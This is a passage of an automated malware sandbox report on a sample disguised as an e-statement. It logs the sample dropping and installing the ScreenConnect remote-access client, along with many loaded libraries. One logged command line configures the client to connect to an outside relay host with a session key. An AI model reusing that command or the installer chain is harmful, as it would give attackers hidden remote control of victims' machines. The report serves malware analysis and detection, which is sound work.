                                  Source: 0.2.estatement020134230003.exe.virus.exe.50b0000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.50b0000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.estatement020134230003.exe.virus.exe.50b0000.7.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal48.evad.winEXE@18/58@3/2
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)Jump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\estatement020134230003.exe.virus.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: estatement020134230003.exe.virus.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: estatement020134230003.exe.virus.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI76AF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5732625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: estatement020134230003.exe.virus.exeReversingLabs: Detection: 18%
                                  Source: estatement020134230003.exe.virus.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: estatement020134230003.exe.virus.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeFile read: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\estatement020134230003.exe.virus.exe "C:\Users\user\Desktop\estatement020134230003.exe.virus.exe"
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9422C348B364C7554592E19E8B2A0DAC C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI76AF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5732625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 033BA5D71B7F944453A970924D39DAE7
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 866783798F001865CAC127B6D020676D E Global\MSI0000
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=learnskillboosts.con-ip.com&p=8041&s=c9e2cffd-3b6b-48ba-b186-2346c9437d68&k=BgIAAACkAABSU0ExAAgAAAEAAQDh9vKuLEL1L4HK6ORtVBsB%2bthOksnlK7Ue9qyl%2f0hx9D6Dat7da%2fwWDSnfFAil7wZKoZkfGeFuVZh3db2B%2fNSvW1GbYYRU0i1tb65QvaGA%2fLvqINqA%2fMRlkTLEsdJ%2fbBxBWucr3qLZST6J6zV5%2bJ3YeRZg2t2x3hg00znLoKDHzKrITuiILcoCFsdX8uO3NTl2K0LkUPBJEwrHeKYioqGccrKSxO68%2fPJLrw6iaEa%2fbdf3oiyw%2fF5lubvyzuV43Lm%2b7jGQuatswnq0I7edWlBMXC6AaGp4XFBg3ZW%2fLZs6BDLgcD1KTXwQtIgJkldweisogA4AWx5bvaiCcsnM3YGx&c=GENRAL-LM&c=&c=&c=&c=&c=&c=&c="
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "8a895d2b-ac11-46ab-97d1-949397ce5283" "User"
                                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "bff281c5-2f25-4369-bbf2-587ffb428846" "System"
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9422C348B364C7554592E19E8B2A0DAC CJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 033BA5D71B7F944453A970924D39DAE7Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 866783798F001865CAC127B6D020676D E Global\MSI0000Jump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI76AF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5732625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "8a895d2b-ac11-46ab-97d1-949397ce5283" "User"Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe" "RunRole" "bff281c5-2f25-4369-bbf2-587ffb428846" "System"Jump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
